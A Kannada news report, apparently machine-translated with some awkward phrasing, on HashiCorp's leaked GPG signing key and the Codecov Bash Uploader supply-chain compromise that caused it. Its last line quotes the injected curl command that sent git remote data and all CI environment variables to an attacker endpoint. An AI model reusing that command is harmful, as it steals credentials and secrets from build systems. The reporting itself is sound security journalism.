ಓಪನ್ ಸೋರ್ಸ್ ಉಪಕರಣಗಳಾದ ವ್ಯಾಗ್ರಾಂಟ್, ಪ್ಯಾಕರ್, ನೊಮಾಡ್ ಮತ್ತು ಟೆರ್ರಾಫಾರ್ಮ್ ಅನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಲು ಹೆಸರುವಾಸಿಯಾದ HashiCorp, ಬಿಡುಗಡೆಗಳನ್ನು ಪರಿಶೀಲಿಸುವ ಡಿಜಿಟಲ್ ಸಹಿಗಳನ್ನು ರಚಿಸಲು ಬಳಸುವ ಖಾಸಗಿ GPG ಕೀ ಸೋರಿಕೆಯನ್ನು ಘೋಷಿಸಿತು. GPG ಕೀಗೆ ಪ್ರವೇಶವನ್ನು ಪಡೆದ ಆಕ್ರಮಣಕಾರರು HashiCorp ಉತ್ಪನ್ನಗಳನ್ನು ಸರಿಯಾದ ಡಿಜಿಟಲ್ ಸಹಿಯೊಂದಿಗೆ ಪರಿಶೀಲಿಸುವ ಮೂಲಕ ಸಂಭಾವ್ಯವಾಗಿ ಗುಪ್ತ ಬದಲಾವಣೆಗಳನ್ನು ಮಾಡಬಹುದು. ಅದೇ ಸಮಯದಲ್ಲಿ, ಆಡಿಟ್ ಸಮಯದಲ್ಲಿ, ಅಂತಹ ಮಾರ್ಪಾಡುಗಳನ್ನು ಮಾಡುವ ಪ್ರಯತ್ನಗಳ ಯಾವುದೇ ಕುರುಹುಗಳನ್ನು ಗುರುತಿಸಲಾಗಿಲ್ಲ ಎಂದು ಕಂಪನಿ ಹೇಳಿದೆ.
ಪ್ರಸ್ತುತ, ರಾಜಿಯಾದ GPG ಕೀಯನ್ನು ಹಿಂತೆಗೆದುಕೊಳ್ಳಲಾಗಿದೆ ಮತ್ತು ಅದರ ಸ್ಥಳದಲ್ಲಿ ಹೊಸ ಕೀಲಿಯನ್ನು ಪರಿಚಯಿಸಲಾಗಿದೆ. ಸಮಸ್ಯೆಯು SHA256SUM ಮತ್ತು SHA256SUM.sig ಫೈಲ್ಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಪರಿಶೀಲನೆಯ ಮೇಲೆ ಮಾತ್ರ ಪರಿಣಾಮ ಬೀರಿತು ಮತ್ತು ಲಿನಕ್ಸ್ DEB ಮತ್ತು RPM ಪ್ಯಾಕೇಜುಗಳ ಡಿಜಿಟಲ್ ಸಿಗ್ನೇಚರ್ಗಳ ಉತ್ಪಾದನೆಯ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರಲಿಲ್ಲ ಬಿಡುಗಡೆಗಳು.hashicorp.com ಮೂಲಕ ಒದಗಿಸಲಾಗಿದೆ, ಹಾಗೆಯೇ ಮ್ಯಾಕೋಸ್ ಮತ್ತು ವಿಂಡೋಸ್ಗಾಗಿ ಬಿಡುಗಡೆಯ ಪರಿಶೀಲನಾ ಕಾರ್ಯವಿಧಾನಗಳು (AuthentiCode) .
ನಿರಂತರ ಏಕೀಕರಣ ವ್ಯವಸ್ಥೆಗಳಿಂದ ಕವರೇಜ್ ವರದಿಗಳನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಮೂಲಸೌಕರ್ಯದಲ್ಲಿ ಕೋಡ್ಕೋವ್ ಬ್ಯಾಷ್ ಅಪ್ಲೋಡರ್ (ಕೋಡೆಕೋವ್-ಬಾಶ್) ಸ್ಕ್ರಿಪ್ಟ್ ಬಳಕೆಯಿಂದಾಗಿ ಸೋರಿಕೆ ಸಂಭವಿಸಿದೆ. ಕೋಡ್ಕೋವ್ ಕಂಪನಿಯ ಮೇಲಿನ ದಾಳಿಯ ಸಮಯದಲ್ಲಿ, ನಿರ್ದಿಷ್ಟ ಸ್ಕ್ರಿಪ್ಟ್ನಲ್ಲಿ ಹಿಂಬಾಗಿಲನ್ನು ಮರೆಮಾಡಲಾಗಿದೆ, ಅದರ ಮೂಲಕ ಪಾಸ್ವರ್ಡ್ಗಳು ಮತ್ತು ಎನ್ಕ್ರಿಪ್ಶನ್ ಕೀಗಳನ್ನು ಆಕ್ರಮಣಕಾರರ ಸರ್ವರ್ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ.
ಹ್ಯಾಕ್ ಮಾಡಲು, ದಾಳಿಕೋರರು Codecov ಡಾಕರ್ ಚಿತ್ರವನ್ನು ರಚಿಸುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿನ ದೋಷದ ಲಾಭವನ್ನು ಪಡೆದರು, ಇದು codecov.io ನಿಂದ ವಿತರಿಸಲಾದ ಬ್ಯಾಷ್ ಅಪ್ಲೋಡರ್ ಸ್ಕ್ರಿಪ್ಟ್ಗೆ ಬದಲಾವಣೆಗಳನ್ನು ಮಾಡಲು ಅಗತ್ಯವಾದ GCS (Google ಕ್ಲೌಡ್ ಸ್ಟೋರೇಜ್) ಗೆ ಪ್ರವೇಶ ಡೇಟಾವನ್ನು ಹೊರತೆಗೆಯಲು ಅವರಿಗೆ ಅವಕಾಶ ಮಾಡಿಕೊಟ್ಟಿತು. ಜಾಲತಾಣ. ಬದಲಾವಣೆಗಳನ್ನು ಜನವರಿ 31 ರಂದು ಮತ್ತೆ ಮಾಡಲಾಯಿತು, ಎರಡು ತಿಂಗಳವರೆಗೆ ಪತ್ತೆಹಚ್ಚಲಾಗಿಲ್ಲ ಮತ್ತು ಗ್ರಾಹಕರ ನಿರಂತರ ಏಕೀಕರಣ ವ್ಯವಸ್ಥೆಯ ಪರಿಸರದಲ್ಲಿ ಸಂಗ್ರಹವಾಗಿರುವ ಮಾಹಿತಿಯನ್ನು ಹೊರತೆಗೆಯಲು ದಾಳಿಕೋರರಿಗೆ ಅವಕಾಶ ಮಾಡಿಕೊಟ್ಟಿತು. ಸೇರಿಸಿದ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಬಳಸಿಕೊಂಡು, ಆಕ್ರಮಣಕಾರರು ಪರೀಕ್ಷಿತ Git ರೆಪೊಸಿಟರಿ ಮತ್ತು ಅಪ್ಲಿಕೇಶನ್ ಕೋಡ್, ರೆಪೊಸಿಟರಿಗಳು ಮತ್ತು ಸೇವೆಗಳಾದ Amazon Web Services ಮತ್ತು GitHub ನಂತಹ ಸೇವೆಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ಸಂಘಟಿಸಲು ನಿರಂತರ ಏಕೀಕರಣ ವ್ಯವಸ್ಥೆಗಳಿಗೆ ರವಾನಿಸಲಾದ ಟೋಕನ್ಗಳು, ಎನ್ಕ್ರಿಪ್ಶನ್ ಕೀಗಳು ಮತ್ತು ಪಾಸ್ವರ್ಡ್ಗಳು ಸೇರಿದಂತೆ ಎಲ್ಲಾ ಪರಿಸರ ವೇರಿಯಬಲ್ಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಪಡೆಯಬಹುದು.
ನೇರ ಕರೆಗೆ ಹೆಚ್ಚುವರಿಯಾಗಿ, Codecov-action (Github), Codecov-circleci-orb ಮತ್ತು Codecov-bitrise-step ನಂತಹ ಇತರ ಅಪ್ಲೋಡರ್ಗಳ ಭಾಗವಾಗಿ Codecov Bash ಅಪ್ಲೋಡರ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಬಳಸಲಾಗಿದೆ, ಅವರ ಬಳಕೆದಾರರು ಸಹ ಸಮಸ್ಯೆಯಿಂದ ಪ್ರಭಾವಿತರಾಗಿದ್ದಾರೆ. codecov-bash ಮತ್ತು ಸಂಬಂಧಿತ ಉತ್ಪನ್ನಗಳ ಎಲ್ಲಾ ಬಳಕೆದಾರರು ತಮ್ಮ ಮೂಲಸೌಕರ್ಯಗಳನ್ನು ಆಡಿಟ್ ಮಾಡಲು ಶಿಫಾರಸು ಮಾಡುತ್ತಾರೆ, ಜೊತೆಗೆ ಪಾಸ್ವರ್ಡ್ಗಳು ಮತ್ತು ಎನ್ಕ್ರಿಪ್ಶನ್ ಕೀಗಳನ್ನು ಬದಲಾಯಿಸುತ್ತಾರೆ. ರೇಖೆಯ ಕರ್ಲ್ -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || ನಿಜ
ಮೂಲ: opennet.ru